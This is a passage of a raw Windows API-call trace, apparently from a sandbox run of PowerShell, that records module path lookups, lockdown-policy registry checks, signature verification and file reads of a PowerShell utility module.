lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", nBufferLength=0x105, lpBuffer=0x1b81c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x63 [0269.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81c9f0) returned 1 [0269.312] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x1b81cad0 | out: lpFileInformation=0x1b81cad0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0269.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81c9b0) returned 1 [0269.313] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0269.313] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0269.314] CoTaskMemAlloc (cb=0x20e) returned 0x1a9d0440 [0269.314] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1a9d0440, nSize=0x105 | out: lpBuffer="") returned 0x97 [0269.314] CoTaskMemFree (pv=0x1a9d0440) [0269.314] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b81c370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0269.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81c7b0) returned 1 [0269.314] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b81c890 | out: lpFileInformation=0x1b81c890*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0269.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81c770) returned 1 [0269.315] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0269.321] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b81c370, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0269.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81c7b0) returned 1 [0269.321] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b81c890 | out: lpFileInformation=0x1b81c890*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0269.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81c770) returned 1 [0269.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x1b81c370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0269.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81c7b0) returned 1 [0269.321] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b81c890 | out: lpFileInformation=0x1b81c890*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0269.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81c770) returned 1 [0269.322] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x105, lpBuffer=0x1b81c1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x50 [0269.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81c610) returned 1 [0269.322] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x1b81c6f0 | out: lpFileInformation=0x1b81c6f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0269.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81c5d0) returned 1 [0269.323] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0269.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x105, lpBuffer=0x1b81c1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x58 [0269.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81c610) returned 1 [0269.323] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x1b81c6f0 | out: lpFileInformation=0x1b81c6f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0269.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81c5d0) returned 1 [0269.325] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0269.520] CryptGetHashParam (in: hHash=0x545d80, dwParam=0x2, pbData=0x1a91a460, pdwDataLen=0x1b818230, dwFlags=0x0 | out: pbData=0x1a91a460, pdwDataLen=0x1b818230) returned 1 [0269.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1b81c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0269.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1b81c010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0269.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1b81bda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0269.884] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b81bf70, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0269.885] CoTaskMemAlloc (cb=0x20c) returned 0x1a9fb410 [0269.885] GetSystemDirectoryW (in: lpBuffer=0x1a9fb410, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0269.885] CoTaskMemFree (pv=0x1a9fb410) [0269.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0269.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x1b81be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0269.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81c280) returned 1 [0269.885] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b81c360 | out: lpFileInformation=0x1b81c360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0269.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81c240) returned 1 [0269.885] WldpGetLockdownPolicy () returned 0x0 [0269.885] GetSystemInfo (in: lpSystemInfo=0x1b81c3c0 | out: lpSystemInfo=0x1b81c3c0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0269.885] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b81c2c8 | out: phkResult=0x1b81c2c8*=0x694) returned 0x0 [0269.885] RegQueryValueExW (in: hKey=0x694, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b81c318, lpData=0x0, lpcbData=0x1b81c310*=0x0 | out: lpType=0x1b81c318*=0x0, lpData=0x0, lpcbData=0x1b81c310*=0x0) returned 0x2 [0269.885] RegCloseKey (hKey=0x694) returned 0x0 [0269.886] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b81be10, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0269.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81c2a0) returned 1 [0269.886] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x23e2668 | out: lpFileInformation=0x23e2668*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0269.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81c260) returned 1 [0269.886] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b81bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0269.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81c210) returned 1 [0269.886] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x1b81c2f0 | out: lpFileInformation=0x1b81c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0269.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81c1d0) returned 1 [0269.886] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b81bd80, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0269.886] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b81bbe0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0269.886] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b81bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0269.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81c0f0) returned 1 [0269.886] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x1b81c1d0 | out: lpFileInformation=0x1b81c1d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0269.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81c0b0) returned 1 [0269.887] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b81bba0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0269.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81c080) returned 1 [0269.887] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x694 [0269.887] GetFileType (hFile=0x694) returned 0x1 [0269.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81bff0) returned 1 [0269.887] GetFileType (hFile=0x694) returned 0x1 [0269.887] WTGetSignatureInfo () returned 0x0 [0269.911] CertDuplicateCertificateContext (pCertContext=0x1aa06360) returned 0x1aa06360 [0269.911] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b81c118 | out: phkResult=0x1b81c118*=0x6e4) returned 0x0 [0269.911] RegQueryValueExW (in: hKey=0x6e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81c168, lpData=0x0, lpcbData=0x1b81c160*=0x0 | out: lpType=0x1b81c168*=0x1, lpData=0x0, lpcbData=0x1b81c160*=0x56) returned 0x0 [0269.911] RegQueryValueExW (in: hKey=0x6e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81c168, lpData=0x23e3500, lpcbData=0x1b81c160*=0x56 | out: lpType=0x1b81c168*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b81c160*=0x56) returned 0x0 [0269.911] RegCloseKey (hKey=0x6e4) returned 0x0 [0269.911] CoTaskMemAlloc (cb=0x10) returned 0x1a919be0 [0269.911] CoTaskMemAlloc (cb=0x50) returned 0x1a9d4690 [0269.911] WinVerifyTrust () returned 0x0 [0269.912] CoTaskMemFree (pv=0x1a9d4690) [0269.912] CoTaskMemFree (pv=0x1a919be0) [0269.912] CertFreeCertificateContext (pCertContext=0x1aa06360) returned 1 [0269.912] CloseHandle (hObject=0x694) returned 1 [0269.912] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b81bd30, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0269.912] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81c210) returned 1 [0269.912] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x694 [0269.912] GetFileType (hFile=0x694) returned 0x1 [0269.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81c180) returned 1 [0269.912] GetFileType (hFile=0x694) returned 0x1 [0269.912] SetFilePointer (in: hFile=0x694, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b81c1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b81c1c8*=0) returned 0x0 [0269.913] ReadFile (in: hFile=0x694, lpBuffer=0x23e4740, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81c248, lpOverlapped=0x0 | out: lpBuffer=0x23e4740*, lpNumberOfBytesRead=0x1b81c248*=0x1000, lpOverlapped=0x0) returned 1 [0269.913] SetFilePointer (in: hFile=0x694, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b81c1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b81c1c8*=0) returned 0x1000 [0269.913] ReadFile (in: hFile=0x694, lpBuffer=0x23e4740, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81c248, lpOverlapped=0x0 | out: lpBuffer=0x23e4740*, lpNumberOfBytesRead=0x1b81c248*=0x1000, lpOverlapped=0x0) returned 1 [0269.913] SetFilePointer (in: hFile=0x694, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b81c1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b81c1c8*=0) returned 0x2000 [0269.913] ReadFile (in: hFile=0x694, lpBuffer=0x23e4740, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81c248, lpOverlapped=0x0 | out: lpBuffer=0x23e4740*, lpNumberOfBytesRead=0x1b81c248*=0x1000, lpOverlapped=0x0) returned 1 [0269.913] SetFilePointer (in: hFile=0x694, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b81c1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b81c1c8*=0) returned 0x3000 [0269.913] ReadFile (in: hFile=0x694, lpBuffer=0x23e4740, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81c248, lpOverlapped=0x0 | out: lpBuffer=0x23e4740*, lpNumberOfBytesRead=0x1b81c248*=0x1000, lpOverlapped=0x0) returned 1 [0269.914] SetFilePointer (in: hFile=0x694, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b81c1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b81c1c8*=0) returned 0x4000 [0269.914] ReadFile (in: hFile=0x694, lpBuffer=0x23e4740, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81c248, lpOverlapped=0x0 | out: lpBuffer=0x23e4740*, lpNumberOfBytesRead=0x1b81c248*=0x1000, lpOverlapped=0x0) returned 1 [0269.914] SetFilePointer (in: hFile=0x694, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b81c1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b81c1c8*=0) returned 0x5000 [0269.914] ReadFile (in: hFile=0x694, lpBuffer=0x23e4740, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81c248, lpOverlapped=0x0 | out: lpBuffer=0x23e4740*, lpNumberOfBytesRead=0x1b81c248*=0x298, lpOverlapped=0x0) returned 1 [0269.914] SetFilePointer (in: hFile=0x694, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b81c1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b81c1c8*=0) returned 0x5298 [0269.914] ReadFile (in: hFile=0x694, lpBuffer=0x23e4740, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81c248, lpOverlapped=0x0 | out: lpBuffer=0x23e4740*, lpNumberOfBytesRead=0x1b81c248*=0x0, lpOverlapped=0x0) returned 1 [0269.914] CoTaskMemAlloc (cb=0x20c) returned 0x1a9fc510 [0269.914] GetSystemDirectoryW (in: lpBuffer=0x1a9fc510, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0269.915] CoTaskMemFree (pv=0x1a9fc510) [0269.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81bb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0269.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x1b81bd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0269.915] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81c160) returned 1 [0269.915] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b81c240 | out: lpFileInformation=0x1b81c240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0269.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81c120) returned 1 [0269.915] WldpGetLockdownPolicy () returned 0x0 [0269.915] GetSystemInfo (in: lpSystemInfo=0x1b81c2a0 | out: lpSystemInfo=0x1b81c2a0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0269.915] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", 